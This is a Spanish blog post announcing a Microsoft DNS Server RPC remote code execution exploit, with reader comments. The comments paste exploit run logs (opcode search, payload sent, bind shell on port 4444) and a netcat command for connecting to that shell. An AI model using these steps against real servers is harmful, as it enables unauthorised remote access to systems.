Random IRC quote :      <@garbanzosf> soy asocial, pero con mucho nabo

Microsoft DNS Server Remote Code execution Exploit

Hola,

Aquí os dejo el análisis de la vulnerabilidad y un exploit que hemos programado Andrés Tarasco y yo, el exploit estáHomer y Bender discuten sobre el exploit programado como bender manda, usando el API de RPC de Windows y funciona a través del puerto 445 tcp el cual Microsoft en un principio no había tenido en cuenta, ahora han actualizado el advisory 😉

Un saludo!

6 Comentarios para “Microsoft DNS Server Remote Code execution Exploit”

  1. Comment por makuvex | 04/16/07 at 8:50 pm

    hola

    fabulo exploit… felicidades 🙂 …

    desafortunadamente no se kien use el windows 2000 y 2003 para probar su exploit 🙁 … pero si algun dia encuentro kien tenga windows 2000 y 2003 lo probare y les avisare como me fue… 😉

    les tengo una pregunta… pero no se enojen, ya se ke hay foros para esto, pero es ke por mas foros ke busco nadie me responde… lo ke pasa es ke estoy aprendiendo a hacer exploits, y me interesan los exploits remotos, pero nadie me dice ke debo aprender para hacer exploits remotos, uds me podrian decir ke debo aprender… no les pido ke hagan un manual o un videotutorial ni nada por el estilo, solo diganme ke tengo ke aprender para hacer un exploit remoto porfavor…

    espero aki me puedan ayudar… sin embargo, de nuevo felicitaciones, espero se vuelvan famoso su exploit

    salu2 🙂

  2. Comment por ANELKAOS | 04/18/07 at 3:35 am

    Muy bueno Mario 🙂 os lo he puesto aquí:

    http://foro.elhacker.net/index.php/topic,161994.0.html

    Lo estuve probando esta tarde pero sobre 2k3+SP2 con lo que….

    [+] Now try to connect to port 4444
    [-] RPC Server reported exception 0x6be = 1726
    [-] Looks like remote RPC server crashed :/

    Un saludo.

  3. Comment por svch0st | 04/23/07 at 9:08 am

    Veo que seguís siendo putos amos…
    Solo recordaros que Bender es Dios y que siempre hemos de alabarle y respertarle bajo cualquier circunstanciamen.
    Un saludo y a ver cuando nos tomamos unas cañotas…

  4. Comment por siggame | 04/26/07 at 11:08 am

    C:\Documents and Settings>dnstest2 -h 127.0.0.1
    ————————————————————–
    Microsoft Dns Server local & remote RPC Exploit code
    Exploit code by Andres Tarasco & Mario Ballano
    Tested against Windows 2000 server SP4 and Windows 2003 SP2
    ————————————————————–

    [+] Remote Host identified as Windows 2000
    [-] No port selected. Trying Ninja sk1llz
    [+] Binding to ncacn_ip_tcp:127.0.0.1
    [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
    [+] RPC binding string: ncacn_ip_tcp:222.122.46.150[1062]
    [+] Dynamic DNS rpc port found (1062)
    [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10
    62]
    [+] RpcBindingFromStringBinding success
    [+] Searching local opcodes at Kernel32.dll (0x77e50000)
    [+] Searching 0x100000 bytes
    [+] Opcode » jmp esp» at address 0x
    [+] Please report this offset to us so we can update the exploit =)
    [+] Sending Exploit code to DnssrvOperation()
    [+] Now try to connect to port 4444
    [-] RPC Server reported exception 0x6be = 1726
    [-] Looks like remote RPC server crashed :/

    why DNS’s close?

  5. Comment por Mario | 04/28/07 at 11:30 pm

    Hi,

    Seems that old versions of DNS Server have different compilation than newers, so perhaps the stack layout is not the same, the exploit was tested only with updated OSes, you can modify yourself the exploit in order to get it working 🙂

    Cheers,

    Mario

  6. Comment por PoWeRGuArD | 05/10/07 at 12:28 pm

    hi all friend,

    I use to exploit my server 2003.
    Exploit done result is message..

    C:\>dnstest -h 127.0.0.1
    ————————————————————–
    Microsoft Dns Server local & remote RPC Exploit code
    Exploit code by Andres Tarasco & Mario Ballano
    Tested against Windows 2000 server SP4 and Windows 2003 SP2
    ————————————————————–

    [+] Remote Host identified as Windows 2003
    [-] No port selected. Trying Ninja sk1llz
    [+] Binding to ncacn_ip_tcp:127.0.0.1
    [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
    [+] RPC binding string: ncacn_ip_tcp:127.0.0.1[1027]
    [+] Dynamic DNS rpc port found (1027)
    [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10
    27]
    [+] RpcBindingFromStringBinding success
    [+] Sending Exploit code to DnssrvOperation()
    [+] Now try to connect to port 4444
    [-] Return code: 0

    Okey… afeter other computer in lan run nc (netcat) and => nc 192.168.1.100 4444 but not connect ,
    where i mistake?

    Thanks, all

Se han cerrado los comentarios